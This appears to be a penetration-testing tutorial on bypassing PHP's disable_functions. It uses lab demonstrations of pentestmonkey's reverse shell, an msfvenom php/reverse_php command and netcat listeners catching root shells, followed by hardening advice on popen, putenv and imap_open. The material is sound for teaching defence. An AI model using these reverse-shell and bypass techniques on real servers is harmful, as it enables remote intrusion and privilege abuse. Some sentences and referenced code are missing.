system : immediately shows all output, and is used to show text
passthru: returns output immediately, but is used for binary data and is used for returning binary data instead of ascii.
shell_exec returns the full output of the command, when the command finished running.
exec: only returns the last line of the generated output.
Imagine that you found a file upload or Remote File Inclusion vulnerability where you can upload/request your php-reverse-shell and get a quick shell. However, it may be possible that administrator disabled all of the above php functions so let’s see these 4 dangerous php functions in action first before we jump to the other functions.
Nice! We can run OS commands and get the output of the command. So what happens if we disable all of these 4 functions ? Disable dangerous php functions above from php.ini file under /etc/php/7.2/cli/php.ini and set display_errors to On.
If you are performing this exercise via your apache, you may need to disable them on /etc/php/7.2/apache2/php.ini . Let’s run the same php files again.
root@kali:~# php pasthru.php
PHP Warning: passthru() has been disabled for security reasons in /root/pasthru.php on line 2
Warning: passthru() has been disabled for security reasons in /root/pasthru.php on line 2
root@kali:~#
Please also note that we are receiving this error due to Display_errors= On feature. You can enable this feature on production environment but you need to disable it on live environment.
PHP-Reverse-Shell Pentestmonkey
We all know famous php-reverse-shell for linux from pentest-monkey. We can try to get a shell with the reverse shell above as it uses proc_open function.
root@kali:/usr/share/webshells/php# PHP Notice: Undefined variable: daemon in /usr/share/webshells/php/php-reverse-shell.php on line 184
Notice: Undefined variable: daemon in /usr/share/webshells/php/php-reverse-shell.php on line 184
Successfully opened reverse shell to 127.0.0.1:1234
Listening the shell. We got the root shell
root@kali:/usr/share/webshells/php# nc -lvp 1234
listening on [any] 1234 ...
connect to [127.0.0.1] from localhost [127.0.0.1] 49308
Linux kali 4.17.0-kali1-686 #1 SMP Debian 4.17.8-1kali1 (2018-07-24) i686 GNU/Linux
15:08:16 up 1 day, 1:59, 1 user, load average: 0.08, 0.10, 0.09
USER TTY FROM LOGIN@ IDLE JCPU PCPU WHAT
root :1 :1 07:23 ?xdm? 1:39 0.01s /usr/lib/gdm3/gdm-x-session --run-script gnome-session
uid=0(root) gid=0(root) groups=0(root)
/bin/sh: 0: can't access tty; job control turned off
#
Proc_open
Disable proc_open function as well.
root@kali:/usr/share/webshells/php# php php-reverse-shell.php
PHP Notice: Undefined variable: pipes in /usr/share/webshells/php/php-reverse-shell.php on line 113
Notice: Undefined variable: pipes in /usr/share/webshells/php/php-reverse-shell.php on line 113
PHP Warning: proc_open() has been disabled for security reasons in /usr/share/webshells/php/php-reverse-shell.php on line 113
Warning: proc_open() has been disabled for security reasons in /usr/share/webshells/php/php-reverse-shell.php on line 113
PHP Notice: Undefined variable: daemon in /usr/share/webshells/php/php-reverse-shell.php on line 184
Notice: Undefined variable: daemon in /usr/share/webshells/php/php-reverse-shell.php on line 184
ERROR: Can't spawn shell
root@kali:/usr/share/webshells/php#
Msfvenom PHP Shell
We can’t get a shell now. Let’s create a msfvenom php shell.
root@kali:/usr/share/webshells/php# msfvenom -p php/reverse_php LHOST=127.0.0.1 LPORT=443 -f raw > shell.php
[-] No platform was selected, choosing Msf::Module::Platform::PHP from the payload
[-] No arch selected, selecting arch: php from the payload
No encoder or badchars specified, outputting raw payload
Payload size: 3046 bytes
root@kali:/usr/share/webshells/php#
root@kali:/usr/share/webshells/php# php shell.php
/*^
We can get a shell. How possible ?
root@kali:/usr/share/webshells/php# nc -lvp 443
listening on [any] 443 ...
connect to [127.0.0.1] from localhost [127.0.0.1] 43828
id
uid=0(root) gid=0(root) groups=0(root)
So we disabled bunch of dangerous php functions but we can still get a shell. We can go through the php code now:
It looks interesting. We can see shell_exec, passthru, popen, exec, system and proc_open functions in the code from msfvenom. Let’s compare again these functions to our disable_function in php.ini . Popen seems interesting.
Popen
After disabling popen, I would be able to still get a shell and i noticed another line from the shell.php which is below:
You can download Chankro tool from the github and test it as well. It will work smoothly to bypass the disable_functions. In order to block this method, you also need to disable putenv() function.
In order to prevent imap_open bypass, you need to set imap.enable_insecure_rsh to 0. It is 0 as default but if you are in the test environment and want to play with the vulnerability, you can set it to 1 and see the behavior with strace tool in Linux.